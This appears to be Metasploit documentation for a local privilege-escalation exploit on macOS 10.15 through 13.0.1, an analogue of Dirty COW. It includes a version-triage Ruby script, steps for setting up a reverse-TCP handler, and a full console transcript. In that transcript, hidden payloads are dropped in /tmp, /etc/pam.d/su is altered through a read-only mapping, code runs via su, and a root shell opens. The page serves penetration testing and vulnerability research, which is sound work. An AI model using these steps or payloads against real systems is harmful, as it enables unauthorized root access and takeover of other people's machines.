GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/osx/local/mac_dirty_cow.md

Vulnerable Application

This module works against macOS 13.0 through 13.0.1 and macOS 10.15 through 12.6.1. The vulnerability is the macOS equivalent of Dirty COW: an unprivileged local user can modify a read-only file mapping and use that to execute code as root. The module needs an existing session as an unprivileged user on the target. It drops two hidden files in /tmp (the payload and the exploit binary), temporarily modifies the read-only mapping of /etc/pam.d/su so that the payload can be launched through su from the unprivileged session, restores the original mapping, and deletes its /tmp files afterwards.
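The version ranges above are the first thing to triage before pointing the module at a session. The following is an added example, not the module's own check code, that classifies a macOS product version against those ranges and pulls the version out of `sw_vers` output captured in the user session. It uses only Ruby's standard library (Gem::Version); the sample `sw_vers` output is constructed for illustration.

```ruby
# Added example for the version ranges stated in this documentation page; this is
# not the Metasploit module's own check code. Uses only Ruby's standard library.
require 'rubygems'

# Ranges the page lists as affected: macOS 13.0 - 13.0.1 and 10.15 - 12.6.1.
AFFECTED_RANGES = [
  [Gem::Version.new('13.0'),  Gem::Version.new('13.0.1')],
  [Gem::Version.new('10.15'), Gem::Version.new('12.6.1')]
].freeze

# Returns true when +product_version+ (for example "13.0.1") falls inside one
# of the affected ranges. Gem::Version treats "13" and "13.0" as equal, so a
# bare major version compares correctly against the range bounds.
def affected_macos_version?(product_version)
  v = Gem::Version.new(product_version.to_s.strip)
  AFFECTED_RANGES.any? { |low, high| v >= low && v <= high }
rescue ArgumentError
  # Malformed input (for example "garbage") is reported as not affected rather
  # than raising; confirm the version another way in that case.
  false
end

# Pulls ProductVersion out of the multi-line output of `sw_vers`, which is what
# you would run in the unprivileged session before using the module.
def product_version_from_sw_vers(output)
  line = output.each_line.find { |l| l.start_with?('ProductVersion:') }
  return nil unless line
  line.split(':', 2).last.strip
end

# Verdict string for a captured `sw_vers` output.
def triage(sw_vers_output)
  version = product_version_from_sw_vers(sw_vers_output)
  return 'unknown: ProductVersion not found in sw_vers output' if version.nil?
  if affected_macos_version?(version)
    "macOS #{version}: within an affected range, run the module check"
  else
    "macOS #{version}: outside the affected ranges, do not expect the module to work"
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample shaped like `sw_vers` output on the Ventura 13.0 host in
  # the scenario on this page (real output separates fields with a tab).
  sample = "ProductName:\tmacOS\nProductVersion:\t13.0\n"
  puts triage(sample)
end
```

Run it with the real output of `sw_vers` from the target session to decide whether the module's automatic check is even worth running; a version such as 12.6.2 or 13.1 is outside both ranges and the module should not be expected to work there.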

Verification Steps

  1. Start msfconsole.

  2. Do: use multi/handler.

  3. Set the LHOST and PAYLOAD options (the handler listens locally; it has no RHOST).

  4. Do: run.

  5. Execute the payload on the machine and obtain a user session.

  6. Do: use exploit/osx/local/mac_dirty_cow

  7. Set the SESSION, LHOST and LPORT options (use a different LPORT from the one the handler is already using).

  8. Do: run.

  9. Receive a shell session as the root user.

Scenarios

macOS Ventura 13.0

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload osx/x64/meterpreter/reverse_tcp
payload => osx/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Transmitting first stager...(214 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (810648 bytes) to 172.16.199.130
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:49801) at 2023-02-01 16:10:14 -0500
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/osx/local/mac_dirty_cow
[*] Using exploit/osx/local/mac_dirty_cow
msf6 exploit(osx/local/mac_dirty_cow) > set session 1
session => 1
msf6 exploit(osx/local/mac_dirty_cow) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(osx/local/mac_dirty_cow) > set lport 4446
lport => 4446
msf6 exploit(osx/local/mac_dirty_cow) > run
[*] Started reverse TCP handler on 172.16.199.1:4446
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.wNDx86' (17204 bytes) ...
[*] Writing '/tmp/.TKIGnTw0l' (51392 bytes) ...
[*] Executing exploit '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.DfoZanro'
[*] Exploit result: Testing for 10 seconds... RO mapping was modified
[*] Running cmd: echo '/tmp/.wNDx86 & disown' | su
[*] Executing exploit (restoring) '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.aclP0u'
[*] Exploit result: Testing for 10 seconds... RO mapping was modified
[+] Deleted /tmp/.wNDx86
[+] Deleted /tmp/.aclP0u
[+] Deleted /tmp/.DfoZanro
[+] Deleted /tmp/.TKIGnTw0l
[*] Command shell session 2 opened (172.16.199.1:4446 -> 172.16.199.130:49802) at 2023-02-01 16:10:54 -0500

options
/bin/sh: line 29: options: command not found
id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1)
uname -a
Darwin msfusers-Mac.local 22.0.0 Darwin Kernel Version 22.0.0: Tue May 24 20:31:35 PDT 2022; root:xnu-8792.0.50.111.3~5/RELEASE_X86_64 x86_64